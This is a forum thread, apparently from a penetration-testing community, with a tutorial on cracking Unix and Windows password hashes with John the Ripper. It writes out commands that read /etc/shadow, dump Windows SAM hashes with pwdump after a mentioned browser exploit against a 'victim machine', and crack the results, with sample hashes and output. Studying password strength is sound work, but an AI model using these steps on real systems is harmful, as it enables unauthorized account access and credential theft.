Page 1 of 7 123 ... LastLast
Results 1 to 10 of 65

Thread: How to break a unix or windows password with john

  1. #1
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default How to break a unix or windows password with john

    I've had a few PM's recently asking about password cracking. In the intrest of legality I will be cracking my own today. Unix passwords are located in the /etc/shadow file or the /etc/password file.
    So put your self in the directory of john

    Pureh@te ~ # cd /pentest/password/john-1.7.2/run

    Next unix passwords are "shadowed" and we must "unshadow"them. John can do this with the unshadow command

    Pureh@te run # unshadow /etc/passwd /etc/shadow >passwd

    I have now written my "salted" unix password to a file called passwd
    Now I simply point john to the file


    Pureh@te run # john passwd
    Loaded 1 password hash (FreeBSD MD5 [32/32])
    louisvillesucks (root)
    guesses: 1 time: 0:00:08:13 100% (2) c/s: 3758 trying: louisvillesucks

    A few things to note. This uses the default passlist that comes with john. If you have your own list you can either point john at your word list as a argument or you can edit the john.conf file to use your pass list.So it would look like this


    [Options]
    # Wordlist file name, to be used in batch mode
    Wordlist = $JOHN/password.lst
    # Use idle cycles only
    Idle = N
    # Crash recovery file saving delay in seconds
    Save = 600
    # Beep when a password is found (who needs this anyway?)
    Beep = N

    And I changed mine to this. Note the pass list must be in the john/run directory for this to work


    [Options]
    # Wordlist file name, to be used in batch mode
    Wordlist = $JOHN/hatelist.txt
    # Use idle cycles only
    Idle = N
    # Crash recovery file saving delay in seconds
    Save = 600
    # Beep when a password is found (who needs this anyway?)
    Beep = N

    Hopefully this has been some what helpful to someone

  2. #2
    Just burned his ISO
    Join Date
    Oct 2006
    Posts
    24

    Default

    purehate that was excellent.
    it must have been fate!!! ive just been looking for this very thing.

    one of my fellow engineers left the company last week and didn't hand over the axcess list (password list)for our unix run HDD testers.

    I'll have a pop at this tomorow..
    cheers.
    [U] Wannabee Geek ... :cool: [/U]

  3. #3

    Default

    Thank you for posting this purehate.
    Defiantly will be helpful
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  4. #4
    Senior Member PrairieFire's Avatar
    Join Date
    Apr 2007
    Posts
    705

    Default

    Nice write up,

    Might add how to create your own hashs to test your own password strength.

    Using OpenSSL:
    Code:
    openssl passwd -1 mypassword
    Salted:
    Code:
    openssl passwd -1 -salt asdfgqwe mypassword
    Μολὼν λαβέ - Great spirits encounter heavy opposition from mediocre minds.

  5. #5
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by PrairieFire View Post
    Nice write up,

    Might add how to create your own hashs to test your own password strength.

    Using OpenSSL:
    Code:
    openssl passwd -1 mypassword
    Salted:
    Code:
    openssl passwd -1 -salt asdfgqwe mypassword
    This is why I love community. We can always help each other and it is free. Lets hold hands across the world and sing kum-by-yaaa

  6. #6
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Nice one purehate! I ESPECIALLY was fond of your "hatelist". as in Wordlist = $JOHN/hatelist.txt I've only used John in windows though. I might try this out to see if its better under Linux. Have you tried John in Windows? (It uses the command prompt.) Theres also a GUI for it available. But again, thats all under Windows.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  7. #7
    Senior Member PrairieFire's Avatar
    Join Date
    Apr 2007
    Posts
    705

    Default

    Seems faster in hdd install of BT2 for me even when using lots of paramters.
    Μολὼν λαβέ - Great spirits encounter heavy opposition from mediocre minds.

  8. #8
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    no I've never used john in windows. what I do is copy the back up of the sam file and load it into backtrack and crack it with john in backtrack.If any one cares I can show how to do that as well.

  9. #9
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    8

    Default

    Quote Originally Posted by Pete* View Post
    one of my fellow engineers left the company last week and didn't hand over the axcess list (password list)for our unix run HDD testers.
    Umm... why not just set new passwords?

  10. #10
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default windows with john

    Here is the windows portion of this. Im not going to go into how I broke into my windows machine but suffice to say I did this from a-z. So we use pwdump which is located in the windows binary directory under pass words. I uploaded this with metasploit using the ie create browser exploit.Note this vunerability is pacthed but i used a unpatched version for this. Once the .exe is in place in the C:\ directory simply issue the command

    C:\pwdump \l \o: passwd

    This will dump the contents of the back up sam file to a file called passwd.

    next I will copy that file from my victim machine to my superfly backtrack lappy. The file should resemble this.........

    Administrator:500:183B986419E1ED9517306D272A9441BB :555A70434209AA0AB9621E26E6B083FF:::
    ANONYMOUS:1005:AAD3B435B51404EEAAD3B435B51404EE21FA29EE1E0694960CEAD1418BB9E6E:::
    ASPNET:1003:B1EB876CE14DC283594153934628466C:A1E5D 931400FD77F6107A5D4050B4AF0:::
    Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE 0D16AE931B73C59D7E0C089C0:::
    HelpAssistant:1004:C5D763ABA2DE015BECD6D9DAC8AC1C1 E:2C3D74B085F512AE054CD59EF3AB6D48:::
    LNSS_MONITOR_USR:1025:AAD3B435B51404EEAAD3B435B514 04EE:28C80904F8896EB48DAD8FB18D45C63A:::
    SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B514 04EE:FAF25868710610DE776AE4158D493FE2:::


    As you can see I have retrived some useful hashs. Windows pass words are much eaisier to crack than unix because there is no "salts" Any way now point john at the passwd file just like in the unix example.(note I placed the passwd file in the john/run directory to make for less typing.You should get something like this.

    Pureh@te run # john passwd
    Loaded 10 password hashes with no different salts (NT LM DES [32/32 BS])
    (SUPPORT_388945a0)
    (LNSS_MONITOR_USR)
    (Guest)
    (ANONYMOUS)
    E (Administrator:2)
    PUREHAT (Administrator:1)


    As you can see john was able to "crack" my admin password of pure hate fairly quickly. After john runs through the word list it will go into bruteforce mode to try to break your LM hashes. This could take days even months or years I guess depending on your patience and the strength of the password. IIf any one has any questions or would like to see a specific tool demonstarted please feel free to post a request

Page 1 of 7 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •